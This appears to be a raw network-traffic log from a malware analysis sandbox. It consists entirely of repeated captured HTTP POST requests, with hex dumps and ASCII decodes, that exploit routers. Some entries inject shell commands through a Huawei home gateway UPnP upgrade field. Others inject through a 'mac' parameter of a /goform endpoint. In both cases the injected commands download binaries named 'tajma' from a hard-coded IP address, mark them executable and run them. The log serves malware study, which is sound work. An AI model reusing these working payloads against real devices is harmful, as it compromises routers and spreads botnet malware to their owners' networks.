                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
